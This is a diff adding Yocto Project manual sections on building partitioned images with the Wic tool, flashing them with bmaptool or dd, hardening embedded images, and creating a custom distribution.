+     systemd-bootdisk              		Create an EFI disk image with systemd-boot
+     mkhybridiso                   		Create a hybrid ISO image
+     sdimage-bootpart              		Create SD card image with a boot partition
+     directdisk-multi-rootfs       		Create multi rootfs image using rootfs plugin
+     directdisk-bootloader-config  		Create a 'pcbios' direct disk image with custom bootloader config
+
+Once you know the list of available
+Wic images, you can use ``help`` with the command to get help on a
+particular image. For example, the following command returns help on the
+"beaglebone-yocto" image:
+::
+
+   $ wic list beaglebone-yocto help
+
+   Creates a partitioned SD card image for Beaglebone.
+   Boot files are located in the first vfat partition.
+
+Operational Modes
+-----------------
+
+You can use Wic in two different modes, depending on how much control
+you need for specifying the Openembedded build artifacts that are used
+for creating the image: Raw and Cooked:
+
+-  *Raw Mode:* You explicitly specify build artifacts through Wic
+   command-line arguments.
+
+-  *Cooked Mode:* The current
+   :term:`MACHINE` setting and image
+   name are used to automatically locate and provide the build
+   artifacts. You just supply a kickstart file and the name of the image
+   from which to use artifacts.
+
+Regardless of the mode you use, you need to have the build artifacts
+ready and available.
+
+Raw Mode
+~~~~~~~~
+
+Running Wic in raw mode allows you to specify all the partitions through
+the ``wic`` command line. The primary use for raw mode is if you have
+built your kernel outside of the Yocto Project
+:term:`Build Directory`. In other words, you
+can point to arbitrary kernel, root filesystem locations, and so forth.
+Contrast this behavior with cooked mode where Wic looks in the Build
+Directory (e.g. ``tmp/deploy/images/``\ machine).
+
+The general form of the ``wic`` command in raw mode is:
+::
+
+   $ wic create wks_file options ...
+
+     Where:
+
+        wks_file:
+           An OpenEmbedded kickstart file.  You can provide
+           your own custom file or use a file from a set of
+           existing files as described by further options.
+
+        optional arguments:
+          -h, --help            show this help message and exit
+          -o OUTDIR, --outdir OUTDIR
+                                name of directory to create image in
+          -e IMAGE_NAME, --image-name IMAGE_NAME
+                                name of the image to use the artifacts from e.g. core-
+                                image-sato
+          -r ROOTFS_DIR, --rootfs-dir ROOTFS_DIR
+                                path to the /rootfs dir to use as the .wks rootfs
+                                source
+          -b BOOTIMG_DIR, --bootimg-dir BOOTIMG_DIR
+                                path to the dir containing the boot artifacts (e.g.
+                                /EFI or /syslinux dirs) to use as the .wks bootimg
+                                source
+          -k KERNEL_DIR, --kernel-dir KERNEL_DIR
+                                path to the dir containing the kernel to use in the
+                                .wks bootimg
+          -n NATIVE_SYSROOT, --native-sysroot NATIVE_SYSROOT
+                                path to the native sysroot containing the tools to use
+                                to build the image
+          -s, --skip-build-check
+                                skip the build check
+          -f, --build-rootfs    build rootfs
+          -c {gzip,bzip2,xz}, --compress-with {gzip,bzip2,xz}
+                                compress image with specified compressor
+          -m, --bmap            generate .bmap
+          --no-fstab-update     Do not change fstab file.
+          -v VARS_DIR, --vars VARS_DIR
+                                directory with <image>.env files that store bitbake
+                                variables
+          -D, --debug           output debug information
+
+.. note::
+
+   You do not need root privileges to run Wic. In fact, you should not
+   run as root when using the utility.
+
+Cooked Mode
+~~~~~~~~~~~
+
+Running Wic in cooked mode leverages off artifacts in the Build
+Directory. In other words, you do not have to specify kernel or root
+filesystem locations as part of the command. All you need to provide is
+a kickstart file and the name of the image from which to use artifacts
+by using the "-e" option. Wic looks in the Build Directory (e.g.
+``tmp/deploy/images/``\ machine) for artifacts.
+
+The general form of the ``wic`` command using Cooked Mode is as follows:
+::
+
+   $ wic create wks_file -e IMAGE_NAME
+
+     Where:
+
+        wks_file:
+           An OpenEmbedded kickstart file.  You can provide
+           your own custom file or use a file from a set of
+           existing files provided with the Yocto Project
+           release.
+
+        required argument:
+           -e IMAGE_NAME, --image-name IMAGE_NAME
+                                name of the image to use the artifacts from e.g. core-
+                                image-sato
+
+.. _using-a-provided-kickstart-file:
+
+Using an Existing Kickstart File
+--------------------------------
+
+If you do not want to create your own kickstart file, you can use an
+existing file provided by the Wic installation. As shipped, kickstart
+files can be found in the :ref:`overview-manual/overview-manual-development-environment:yocto project source repositories` in the
+following two locations:
+::
+
+   poky/meta-yocto-bsp/wic
+   poky/scripts/lib/wic/canned-wks
+
+Use the following command to list the available kickstart files:
+::
+
+   $ wic list images
+     genericx86                    		Create an EFI disk image for genericx86*
+     beaglebone-yocto              		Create SD card image for Beaglebone
+     edgerouter                    		Create SD card image for Edgerouter
+     qemux86-directdisk            		Create a qemu machine 'pcbios' direct disk image
+     directdisk-gpt                		Create a 'pcbios' direct disk image
+     mkefidisk                     		Create an EFI disk image
+     directdisk                    		Create a 'pcbios' direct disk image
+     systemd-bootdisk              		Create an EFI disk image with systemd-boot
+     mkhybridiso                   		Create a hybrid ISO image
+     sdimage-bootpart              		Create SD card image with a boot partition
+     directdisk-multi-rootfs       		Create multi rootfs image using rootfs plugin
+     directdisk-bootloader-config  		Create a 'pcbios' direct disk image with custom bootloader config
+
+When you use an existing file, you
+do not have to use the ``.wks`` extension. Here is an example in Raw
+Mode that uses the ``directdisk`` file:
+::
+
+   $ wic create directdisk -r rootfs_dir -b bootimg_dir \
+         -k kernel_dir -n native_sysroot
+
+Here are the actual partition language commands used in the
+``genericx86.wks`` file to generate an image:
+::
+
+   # short-description: Create an EFI disk image for genericx86*
+   # long-description: Creates a partitioned EFI disk image for genericx86* machines
+   part /boot --source bootimg-efi --sourceparams="loader=grub-efi" --ondisk sda --label msdos --active --align 1024
+   part / --source rootfs --ondisk sda --fstype=ext4 --label platform --align 1024 --use-uuid
+   part swap --ondisk sda --size 44 --label swap1 --fstype=swap
+
+   bootloader --ptable gpt --timeout=5 --append="rootfstype=ext4 console=ttyS0,115200 console=tty0"
+
+.. _wic-using-the-wic-plugin-interface:
+
+Using the Wic Plugin Interface
+------------------------------
+
+You can extend and specialize Wic functionality by using Wic plugins.
+This section explains the Wic plugin interface.
+
+.. note::
+
+   Wic plugins consist of "source" and "imager" plugins. Imager plugins
+   are beyond the scope of this section.
+
+Source plugins provide a mechanism to customize partition content during
+the Wic image generation process. You can use source plugins to map
+values that you specify using ``--source`` commands in kickstart files
+(i.e. ``*.wks``) to a plugin implementation used to populate a given
+partition.
+
+.. note::
+
+   If you use plugins that have build-time dependencies (e.g. native
+   tools, bootloaders, and so forth) when building a Wic image, you need
+   to specify those dependencies using the :term:`WKS_FILE_DEPENDS`
+   variable.
+
+Source plugins are subclasses defined in plugin files. As shipped, the
+Yocto Project provides several plugin files. You can see the source
+plugin files that ship with the Yocto Project
+:yocto_git:`here </cgit/cgit.cgi/poky/tree/scripts/lib/wic/plugins/source>`.
+Each of these plugin files contains source plugins that are designed to
+populate a specific Wic image partition.
+
+Source plugins are subclasses of the ``SourcePlugin`` class, which is
+defined in the ``poky/scripts/lib/wic/pluginbase.py`` file. For example,
+the ``BootimgEFIPlugin`` source plugin found in the ``bootimg-efi.py``
+file is a subclass of the ``SourcePlugin`` class, which is found in the
+``pluginbase.py`` file.
+
+You can also implement source plugins in a layer outside of the Source
+Repositories (external layer). To do so, be sure that your plugin files
+are located in a directory whose path is
+``scripts/lib/wic/plugins/source/`` within your external layer. When the
+plugin files are located there, the source plugins they contain are made
+available to Wic.
+
+When the Wic implementation needs to invoke a partition-specific
+implementation, it looks for the plugin with the same name as the
+``--source`` parameter used in the kickstart file given to that
+partition. For example, if the partition is set up using the following
+command in a kickstart file:
+::
+
+   part /boot --source bootimg-pcbios --ondisk sda --label boot --active --align 1024
+
+The methods defined as class
+members of the matching source plugin (i.e. ``bootimg-pcbios``) in the
+``bootimg-pcbios.py`` plugin file are used.
+
+To be more concrete, here is the corresponding plugin definition from
+the ``bootimg-pcbios.py`` file for the previous command along with an
+example method called by the Wic implementation when it needs to prepare
+a partition using an implementation-specific function:
+::
+
+                .
+                .
+                .
+   class BootimgPcbiosPlugin(SourcePlugin):
+       """
+       Create MBR boot partition and install syslinux on it.
+       """
+
+      name = 'bootimg-pcbios'
+                .
+                .
+                .
+       @classmethod
+       def do_prepare_partition(cls, part, source_params, creator, cr_workdir,
+                                oe_builddir, bootimg_dir, kernel_dir,
+                                rootfs_dir, native_sysroot):
+           """
+           Called to do the actual content population for a partition i.e. it
+           'prepares' the partition to be incorporated into the image.
+           In this case, prepare content for legacy bios boot partition.
+           """
+                .
+                .
+                .
+
+If a
+subclass (plugin) itself does not implement a particular function, Wic
+locates and uses the default version in the superclass. It is for this
+reason that all source plugins are derived from the ``SourcePlugin``
+class.
+
+The ``SourcePlugin`` class defined in the ``pluginbase.py`` file defines
+a set of methods that source plugins can implement or override. Any
+plugins (subclass of ``SourcePlugin``) that do not implement a
+particular method inherit the implementation of the method from the
+``SourcePlugin`` class. For more information, see the ``SourcePlugin``
+class in the ``pluginbase.py`` file for details:
+
+The following list describes the methods implemented in the
+``SourcePlugin`` class:
+
+-  ``do_prepare_partition()``: Called to populate a partition with
+   actual content. In other words, the method prepares the final
+   partition image that is incorporated into the disk image.
+
+-  ``do_configure_partition()``: Called before
+   ``do_prepare_partition()`` to create custom configuration files for a
+   partition (e.g. syslinux or grub configuration files).
+
+-  ``do_install_disk()``: Called after all partitions have been
+   prepared and assembled into a disk image. This method provides a hook
+   to allow finalization of a disk image (e.g. writing an MBR).
+
+-  ``do_stage_partition()``: Special content-staging hook called
+   before ``do_prepare_partition()``. This method is normally empty.
+
+   Typically, a partition just uses the passed-in parameters (e.g. the
+   unmodified value of ``bootimg_dir``). However, in some cases, things
+   might need to be more tailored. As an example, certain files might
+   additionally need to be taken from ``bootimg_dir + /boot``. This hook
+   allows those files to be staged in a customized fashion.
+
+   .. note::
+
+      ``get_bitbake_var()`` allows you to access non-standard variables that
+      you might want to use for this behavior.
+
+You can extend the source plugin mechanism. To add more hooks, create
+more source plugin methods within ``SourcePlugin`` and the corresponding
+derived subclasses. The code that calls the plugin methods uses the
+``plugin.get_source_plugin_methods()`` function to find the method or
+methods needed by the call. Retrieval of those methods is accomplished
+by filling up a dict with keys that contain the method names of
+interest. On success, these will be filled in with the actual methods.
+See the Wic implementation for examples and details.
+
+.. _wic-usage-examples:
+
+Wic Examples
+------------
+
+This section provides several examples that show how to use the Wic
+utility. All the examples assume the list of requirements in the
+"`Requirements <#wic-requirements>`__" section have been met. The
+examples assume the previously generated image is
+``core-image-minimal``.
+
+.. _generate-an-image-using-a-provided-kickstart-file:
+
+Generate an Image using an Existing Kickstart File
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This example runs in Cooked Mode and uses the ``mkefidisk`` kickstart
+file:
+::
+
+   $ wic create mkefidisk -e core-image-minimal
+   INFO: Building wic-tools...
+             .
+             .
+             .
+   INFO: The new image(s) can be found here:
+     ./mkefidisk-201804191017-sda.direct
+
+   The following build artifacts were used to create the image(s):
+     ROOTFS_DIR:                   /home/stephano/build/master/build/tmp-glibc/work/qemux86-oe-linux/core-image-minimal/1.0-r0/rootfs
+     BOOTIMG_DIR:                  /home/stephano/build/master/build/tmp-glibc/work/qemux86-oe-linux/core-image-minimal/1.0-r0/recipe-sysroot/usr/share
+     KERNEL_DIR:                   /home/stephano/build/master/build/tmp-glibc/deploy/images/qemux86
+     NATIVE_SYSROOT:               /home/stephano/build/master/build/tmp-glibc/work/i586-oe-linux/wic-tools/1.0-r0/recipe-sysroot-native
+
+   INFO: The image(s) were created using OE kickstart file:
+     /home/stephano/build/master/openembedded-core/scripts/lib/wic/canned-wks/mkefidisk.wks
+
+The previous example shows the easiest way to create an image by running
+in cooked mode and supplying a kickstart file and the "-e" option to
+point to the existing build artifacts. Your ``local.conf`` file needs to
+have the :term:`MACHINE` variable set
+to the machine you are using, which is "qemux86" in this example.
+
+Once the image builds, the output provides image location, artifact use,
+and kickstart file information.
+
+.. note::
+
+   You should always verify the details provided in the output to make
+   sure that the image was indeed created exactly as expected.
+
+Continuing with the example, you can now write the image from the Build
+Directory onto a USB stick, or whatever media for which you built your
+image, and boot from the media. You can write the image by using
+``bmaptool`` or ``dd``:
+::
+
+   $ oe-run-native bmaptool copy mkefidisk-201804191017-sda.direct /dev/sdX
+
+or ::
+
+   $ sudo dd if=mkefidisk-201804191017-sda.direct of=/dev/sdX
+
+.. note::
+
+   For more information on how to use the ``bmaptool``
+   to flash a device with an image, see the
+   ":ref:`dev-manual/dev-manual-common-tasks:flashing images using \`\`bmaptool\`\``"
+   section.
+
+Using a Modified Kickstart File
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Because partitioned image creation is driven by the kickstart file, it
+is easy to affect image creation by changing the parameters in the file.
+This next example demonstrates that through modification of the
+``directdisk-gpt`` kickstart file.
+
+As mentioned earlier, you can use the command ``wic list images`` to
+show the list of existing kickstart files. The directory in which the
+``directdisk-gpt.wks`` file resides is
+``scripts/lib/image/canned-wks/``, which is located in the
+:term:`Source Directory` (e.g. ``poky``).
+Because available files reside in this directory, you can create and add
+your own custom files to the directory. Subsequent use of the
+``wic list images`` command would then include your kickstart files.
+
+In this example, the existing ``directdisk-gpt`` file already does most
+of what is needed. However, for the hardware in this example, the image
+will need to boot from ``sdb`` instead of ``sda``, which is what the
+``directdisk-gpt`` kickstart file uses.
+
+The example begins by making a copy of the ``directdisk-gpt.wks`` file
+in the ``scripts/lib/image/canned-wks`` directory and then by changing
+the lines that specify the target disk from which to boot.
+::
+
+   $ cp /home/stephano/poky/scripts/lib/wic/canned-wks/directdisk-gpt.wks \
+        /home/stephano/poky/scripts/lib/wic/canned-wks/directdisksdb-gpt.wks
+
+Next, the example modifies the ``directdisksdb-gpt.wks`` file and
+changes all instances of "``--ondisk sda``" to "``--ondisk sdb``". The
+example changes the following two lines and leaves the remaining lines
+untouched:
+::
+
+   part /boot --source bootimg-pcbios --ondisk sdb --label boot --active --align 1024
+   part / --source rootfs --ondisk sdb --fstype=ext4 --label platform --align 1024 --use-uuid
+
+Once the lines are changed, the
+example generates the ``directdisksdb-gpt`` image. The command points
+the process at the ``core-image-minimal`` artifacts for the Next Unit of
+Computing (nuc) :term:`MACHINE` the
+``local.conf``.
+::
+
+   $ wic create directdisksdb-gpt -e core-image-minimal
+   INFO: Building wic-tools...
+              .
+              .
+              .
+   Initialising tasks: 100% |#######################################| Time: 0:00:01
+   NOTE: Executing SetScene Tasks
+   NOTE: Executing RunQueue Tasks
+   NOTE: Tasks Summary: Attempted 1161 tasks of which 1157 didn't need to be rerun and all succeeded.
+   INFO: Creating image(s)...
+
+   INFO: The new image(s) can be found here:
+     ./directdisksdb-gpt-201710090938-sdb.direct
+
+   The following build artifacts were used to create the image(s):
+     ROOTFS_DIR:                   /home/stephano/build/master/build/tmp-glibc/work/qemux86-oe-linux/core-image-minimal/1.0-r0/rootfs
+     BOOTIMG_DIR:                  /home/stephano/build/master/build/tmp-glibc/work/qemux86-oe-linux/core-image-minimal/1.0-r0/recipe-sysroot/usr/share
+     KERNEL_DIR:                   /home/stephano/build/master/build/tmp-glibc/deploy/images/qemux86
+     NATIVE_SYSROOT:               /home/stephano/build/master/build/tmp-glibc/work/i586-oe-linux/wic-tools/1.0-r0/recipe-sysroot-native
+
+   INFO: The image(s) were created using OE kickstart file:
+     /home/stephano/poky/scripts/lib/wic/canned-wks/directdisksdb-gpt.wks
+
+Continuing with the example, you can now directly ``dd`` the image to a
+USB stick, or whatever media for which you built your image, and boot
+the resulting media:
+::
+
+   $ sudo dd if=directdisksdb-gpt-201710090938-sdb.direct of=/dev/sdb
+   140966+0 records in
+   140966+0 records out
+   72174592 bytes (72 MB, 69 MiB) copied, 78.0282 s, 925 kB/s
+   $ sudo eject /dev/sdb
+
+Using a Modified Kickstart File and Running in Raw Mode
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This next example manually specifies each build artifact (runs in Raw
+Mode) and uses a modified kickstart file. The example also uses the
+``-o`` option to cause Wic to create the output somewhere other than the
+default output directory, which is the current directory:
+::
+
+   $ wic create /home/stephano/my_yocto/test.wks -o /home/stephano/testwic \
+        --rootfs-dir /home/stephano/build/master/build/tmp/work/qemux86-poky-linux/core-image-minimal/1.0-r0/rootfs \
+        --bootimg-dir /home/stephano/build/master/build/tmp/work/qemux86-poky-linux/core-image-minimal/1.0-r0/recipe-sysroot/usr/share \
+        --kernel-dir /home/stephano/build/master/build/tmp/deploy/images/qemux86 \
+        --native-sysroot /home/stephano/build/master/build/tmp/work/i586-poky-linux/wic-tools/1.0-r0/recipe-sysroot-native
+
+   INFO: Creating image(s)...
+
+   INFO: The new image(s) can be found here:
+     /home/stephano/testwic/test-201710091445-sdb.direct
+
+   The following build artifacts were used to create the image(s):
+     ROOTFS_DIR:                   /home/stephano/build/master/build/tmp-glibc/work/qemux86-oe-linux/core-image-minimal/1.0-r0/rootfs
+     BOOTIMG_DIR:                  /home/stephano/build/master/build/tmp-glibc/work/qemux86-oe-linux/core-image-minimal/1.0-r0/recipe-sysroot/usr/share
+     KERNEL_DIR:                   /home/stephano/build/master/build/tmp-glibc/deploy/images/qemux86
+     NATIVE_SYSROOT:               /home/stephano/build/master/build/tmp-glibc/work/i586-oe-linux/wic-tools/1.0-r0/recipe-sysroot-native
+
+   INFO: The image(s) were created using OE kickstart file:
+     /home/stephano/my_yocto/test.wks
+
+For this example,
+:term:`MACHINE` did not have to be
+specified in the ``local.conf`` file since the artifact is manually
+specified.
+
+Using Wic to Manipulate an Image
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Wic image manipulation allows you to shorten turnaround time during
+image development. For example, you can use Wic to delete the kernel
+partition of a Wic image and then insert a newly built kernel. This
+saves you time from having to rebuild the entire image each time you
+modify the kernel.
+
+.. note::
+
+   In order to use Wic to manipulate a Wic image as in this example,
+   your development machine must have the ``mtools`` package installed.
+
+The following example examines the contents of the Wic image, deletes
+the existing kernel, and then inserts a new kernel:
+
+1. *List the Partitions:* Use the ``wic ls`` command to list all the
+   partitions in the Wic image:
+   ::
+
+      $ wic ls tmp/deploy/images/qemux86/core-image-minimal-qemux86.wic
+      Num     Start        End          Size      Fstype
+       1       1048576     25041919     23993344  fat16
+       2      25165824     72157183     46991360  ext4
+
+   The previous output shows two partitions in the
+   ``core-image-minimal-qemux86.wic`` image.
+
+2. *Examine a Particular Partition:* Use the ``wic ls`` command again
+   but in a different form to examine a particular partition.
+
+   .. note::
+
+      You can get command usage on any Wic command using the following
+      form:
+      ::
+
+              $ wic help command
+
+
+      For example, the following command shows you the various ways to
+      use the
+      wic ls
+      command:
+      ::
+
+              $ wic help ls
+
+
+   The following command shows what is in Partition one:
+   ::
+
+        $ wic ls tmp/deploy/images/qemux86/core-image-minimal-qemux86.wic:1
+        Volume in drive : is boot
+         Volume Serial Number is E894-1809
+        Directory for ::/
+
+        libcom32 c32    186500 2017-10-09  16:06
+        libutil  c32     24148 2017-10-09  16:06
+        syslinux cfg       220 2017-10-09  16:06
+        vesamenu c32     27104 2017-10-09  16:06
+        vmlinuz        6904608 2017-10-09  16:06
+                5 files           7 142 580 bytes
+                                 16 582 656 bytes free
+
+   The previous output shows five files, with the
+   ``vmlinuz`` being the kernel.
+
+   .. note::
+
+      If you see the following error, you need to update or create a
+      ``~/.mtoolsrc`` file and be sure to have the line "mtools_skip_check=1"
+      in the file. Then, run the Wic command again:
+      ::
+
+              ERROR: _exec_cmd: /usr/bin/mdir -i /tmp/wic-parttfokuwra ::/ returned '1' instead of 0
+               output: Total number of sectors (47824) not a multiple of sectors per track (32)!
+               Add mtools_skip_check=1 to your .mtoolsrc file to skip this test
+
+
+3. *Remove the Old Kernel:* Use the ``wic rm`` command to remove the
+   ``vmlinuz`` file (kernel):
+   ::
+
+      $ wic rm tmp/deploy/images/qemux86/core-image-minimal-qemux86.wic:1/vmlinuz
+
+4. *Add In the New Kernel:* Use the ``wic cp`` command to add the
+   updated kernel to the Wic image. Depending on how you built your
+   kernel, it could be in different places. If you used ``devtool`` and
+   an SDK to build your kernel, it resides in the ``tmp/work`` directory
+   of the extensible SDK. If you used ``make`` to build the kernel, the
+   kernel will be in the ``workspace/sources`` area.
+
+   The following example assumes ``devtool`` was used to build the
+   kernel:
+   ::
+
+      cp ~/poky_sdk/tmp/work/qemux86-poky-linux/linux-yocto/4.12.12+git999-r0/linux-yocto-4.12.12+git999/arch/x86/boot/bzImage \
+         ~/poky/build/tmp/deploy/images/qemux86/core-image-minimal-qemux86.wic:1/vmlinuz
+
+   Once the new kernel is added back into the image, you can use the
+   ``dd`` command or :ref:`bmaptool
+   <dev-manual/dev-manual-common-tasks:flashing images using \`\`bmaptool\`\`>`
+   to flash your wic image onto an SD card or USB stick and test your
+   target.
+
+   .. note::
+
+      Using ``bmaptool`` is generally 10 to 20 times faster than using ``dd``.
+
+Flashing Images Using ``bmaptool``
+==================================
+
+A fast and easy way to flash an image to a bootable device is to use
+Bmaptool, which is integrated into the OpenEmbedded build system.
+Bmaptool is a generic tool that creates a file's block map (bmap) and
+then uses that map to copy the file. As compared to traditional tools
+such as dd or cp, Bmaptool can copy (or flash) large files like raw
+system image files much faster.
+
+.. note::
+
+   -  If you are using Ubuntu or Debian distributions, you can install
+      the ``bmap-tools`` package using the following command and then
+      use the tool without specifying ``PATH`` even from the root
+      account:
+      ::
+
+         $ sudo apt-get install bmap-tools
+
+   -  If you are unable to install the ``bmap-tools`` package, you will
+      need to build Bmaptool before using it. Use the following command:
+      ::
+
+         $ bitbake bmap-tools-native
+
+Following, is an example that shows how to flash a Wic image. Realize
+that while this example uses a Wic image, you can use Bmaptool to flash
+any type of image. Use these steps to flash an image using Bmaptool:
+
+1. *Update your local.conf File:* You need to have the following set
+   in your ``local.conf`` file before building your image:
+   ::
+
+      IMAGE_FSTYPES += "wic wic.bmap"
+
+2. *Get Your Image:* Either have your image ready (pre-built with the
+   :term:`IMAGE_FSTYPES`
+   setting previously mentioned) or take the step to build the image:
+   ::
+
+      $ bitbake image
+
+3. *Flash the Device:* Flash the device with the image by using Bmaptool
+   depending on your particular setup. The following commands assume the
+   image resides in the Build Directory's ``deploy/images/`` area:
+
+   -  If you have write access to the media, use this command form:
+      ::
+
+         $ oe-run-native bmap-tools-native bmaptool copy build-directory/tmp/deploy/images/machine/image.wic /dev/sdX
+
+   -  If you do not have write access to the media, set your permissions
+      first and then use the same command form:
+      ::
+
+         $ sudo chmod 666 /dev/sdX
+         $ oe-run-native bmap-tools-native bmaptool copy build-directory/tmp/deploy/images/machine/image.wic /dev/sdX
+
+For help on the ``bmaptool`` command, use the following command:
+::
+
+   $ bmaptool --help
+
+Making Images More Secure
+=========================
+
+Security is of increasing concern for embedded devices. Consider the
+issues and problems discussed in just this sampling of work found across
+the Internet:
+
+-  *"*\ `Security Risks of Embedded
+   Systems <https://www.schneier.com/blog/archives/2014/01/security_risks_9.html>`__\ *"*
+   by Bruce Schneier
+
+-  *"*\ `Internet Census
+   2012 <http://census2012.sourceforge.net/paper.html>`__\ *"* by Carna
+   Botnet
+
+-  *"*\ `Security Issues for Embedded
+   Devices <http://elinux.org/images/6/6f/Security-issues.pdf>`__\ *"*
+   by Jake Edge
+
+When securing your image is of concern, there are steps, tools, and
+variables that you can consider to help you reach the security goals you
+need for your particular device. Not all situations are identical when
+it comes to making an image secure. Consequently, this section provides
+some guidance and suggestions for consideration when you want to make
+your image more secure.
+
+.. note::
+
+   Because the security requirements and risks are different for every
+   type of device, this section cannot provide a complete reference on
+   securing your custom OS. It is strongly recommended that you also
+   consult other sources of information on embedded Linux system
+   hardening and on security.
+
+General Considerations
+----------------------
+
+General considerations exist that help you create more secure images.
+You should consider the following suggestions to help make your device
+more secure:
+
+-  Scan additional code you are adding to the system (e.g. application
+   code) by using static analysis tools. Look for buffer overflows and
+   other potential security problems.
+
+-  Pay particular attention to the security for any web-based
+   administration interface.
+
+   Web interfaces typically need to perform administrative functions and
+   tend to need to run with elevated privileges. Thus, the consequences
+   resulting from the interface's security becoming compromised can be
+   serious. Look for common web vulnerabilities such as
+   cross-site-scripting (XSS), unvalidated inputs, and so forth.
+
+   As with system passwords, the default credentials for accessing a
+   web-based interface should not be the same across all devices. This
+   is particularly true if the interface is enabled by default as it can
+   be assumed that many end-users will not change the credentials.
+
+-  Ensure you can update the software on the device to mitigate
+   vulnerabilities discovered in the future. This consideration
+   especially applies when your device is network-enabled.
+
+-  Ensure you remove or disable debugging functionality before producing
+   the final image. For information on how to do this, see the
+   "`Considerations Specific to the OpenEmbedded Build
+   System <#considerations-specific-to-the-openembedded-build-system>`__"
+   section.
+
+-  Ensure you have no network services listening that are not needed.
+
+-  Remove any software from the image that is not needed.
+
+-  Enable hardware support for secure boot functionality when your
+   device supports this functionality.
+
+Security Flags
+--------------
+
+The Yocto Project has security flags that you can enable that help make
+your build output more secure. The security flags are in the
+``meta/conf/distro/include/security_flags.inc`` file in your
+:term:`Source Directory` (e.g. ``poky``).
+
+.. note::
+
+   Depending on the recipe, certain security flags are enabled and
+   disabled by default.
+
+Use the following line in your ``local.conf`` file or in your custom
+distribution configuration file to enable the security compiler and
+linker flags for your build:
+::
+
+   require conf/distro/include/security_flags.inc
+
+Considerations Specific to the OpenEmbedded Build System
+--------------------------------------------------------
+
+You can take some steps that are specific to the OpenEmbedded build
+system to make your images more secure:
+
+-  Ensure "debug-tweaks" is not one of your selected
+   :term:`IMAGE_FEATURES`.
+   When creating a new project, the default is to provide you with an
+   initial ``local.conf`` file that enables this feature using the
+   :term:`EXTRA_IMAGE_FEATURES`
+   variable with the line:
+   ::
+
+      EXTRA_IMAGE_FEATURES = "debug-tweaks"
+
+   To disable that feature, simply comment out that line in your
+   ``local.conf`` file, or make sure ``IMAGE_FEATURES`` does not contain
+   "debug-tweaks" before producing your final image. Among other things,
+   leaving this in place sets the root password as blank, which makes
+   logging in for debugging or inspection easy during development but
+   also means anyone can easily log in during production.
+
+-  It is possible to set a root password for the image and also to set
+   passwords for any extra users you might add (e.g. administrative or
+   service type users). When you set up passwords for multiple images or
+   users, you should not duplicate passwords.
+
+   To set up passwords, use the
+   :ref:`extrausers <ref-classes-extrausers>`
+   class, which is the preferred method. For an example on how to set up
+   both root and user passwords, see the
+   ":ref:`extrausers.bbclass <ref-classes-extrausers>`"
+   section.
+
+   .. note::
+
+      When adding extra user accounts or setting a root password, be
+      cautious about setting the same password on every device. If you
+      do this, and the password you have set is exposed, then every
+      device is now potentially compromised. If you need this access but
+      want to ensure security, consider setting a different, random
+      password for each device. Typically, you do this as a separate
+      step after you deploy the image onto the device.
+
+-  Consider enabling a Mandatory Access Control (MAC) framework such as
+   SMACK or SELinux and tuning it appropriately for your device's usage.
+   You can find more information in the
+   :yocto_git:`meta-selinux </cgit/cgit.cgi/meta-selinux/>` layer.
+
+Tools for Hardening Your Image
+------------------------------
+
+The Yocto Project provides tools for making your image more secure. You
+can find these tools in the ``meta-security`` layer of the
+:yocto_git:`Yocto Project Source Repositories <>`.
+
+Creating Your Own Distribution
+==============================
+
+When you build an image using the Yocto Project and do not alter any
+distribution :term:`Metadata`, you are
+creating a Poky distribution. If you wish to gain more control over
+package alternative selections, compile-time options, and other
+low-level configurations, you can create your own distribution.
+
+To create your own distribution, the basic steps consist of creating
+your own distribution layer, creating your own distribution
+configuration file, and then adding any needed code and Metadata to the
+layer. The following steps provide some more detail:
+
+-  *Create a layer for your new distro:* Create your distribution layer
+   so that you can keep your Metadata and code for the distribution
+   separate. It is strongly recommended that you create and use your own
+   layer for configuration and code. Using your own layer as compared to
+   just placing configurations in a ``local.conf`` configuration file
+   makes it easier to reproduce the same build configuration when using
+   multiple build machines. See the
+   ":ref:`dev-manual/dev-manual-common-tasks:creating a general layer using the \`\`bitbake-layers\`\` script`"
+   section for information on how to quickly set up a layer.
+
+-  *Create the distribution configuration file:* The distribution
+   configuration file needs to be created in the ``conf/distro``
+   directory of your layer. You need to name it using your distribution
+   name (e.g. ``mydistro.conf``).
+
+   .. note::
+
+      The :term:`DISTRO` variable in your ``local.conf`` file determines the
+      name of your distribution.
+
+   You can split out parts of your configuration file into include files
+   and then "require" them from within your distribution configuration
+   file. Be sure to place the include files in the
+   ``conf/distro/include`` directory of your layer. A common example
+   usage of include files would be to separate out the selection of
+   desired version and revisions for individual recipes.
+
+   Your configuration file needs to set the following required
+   variables:
+
+   - :term:`DISTRO_NAME`
+
+   - :term:`DISTRO_VERSION`
+
+   These following variables are optional and you typically set them
+   from the distribution configuration file:
+
+   - :term:`DISTRO_FEATURES`
+
+   - :term:`DISTRO_EXTRA_RDEPENDS`
+
+   - :term:`DISTRO_EXTRA_RRECOMMENDS`
+
+   - :term:`TCLIBC`
+
+   .. tip::
+
+      If you want to base your distribution configuration file on the
+      very basic configuration from OE-Core, you can use
+      ``conf/distro/defaultsetup.conf`` as a reference and just include
+      variables that differ as compared to ``defaultsetup.conf``.
+      Alternatively, you can create a distribution configuration file
+      from scratch using the ``defaultsetup.conf`` file or configuration files
+      from other distributions such as Poky or Angstrom as references.
+
+-  *Provide miscellaneous variables:* Be sure to define any other
+   variables for which you want to create a default or enforce as part
+   of the distribution configuration. You can include nearly any
+   variable from the ``local.conf`` file. The variables you use are not
+   limited to the list in the previous bulleted item.
+
+-  *Point to Your distribution configuration file:* In your
+   ``local.conf`` file in the :term:`Build Directory`,
+   set your
+   :term:`DISTRO` variable to point to
+   your distribution's configuration file. For example, if your
+   distribution's configuration file is named ``mydistro.conf``, then
+   you point to it as follows:
+   ::
+
+      DISTRO = "mydistro"
+
+-  *Add more to the layer if necessary:* Use your layer to hold other
+   information needed for the distribution:
+
+   -  Add recipes for installing distro-specific configuration files
+      that are not already installed by another recipe. If you have
+      distro-specific configuration files that are included by an
+      existing recipe, you should add an append file (``.bbappend``) for
+      those. For general information and recommendations on how to add
+      recipes to your layer, see the "`Creating Your Own
+      Layer <#creating-your-own-layer>`__" and "`Following Best
+      Practices When Creating
+      Layers <#best-practices-to-follow-when-creating-layers>`__"
+      sections.
+
+   -  Add any image recipes that are specific to your distribution.
+
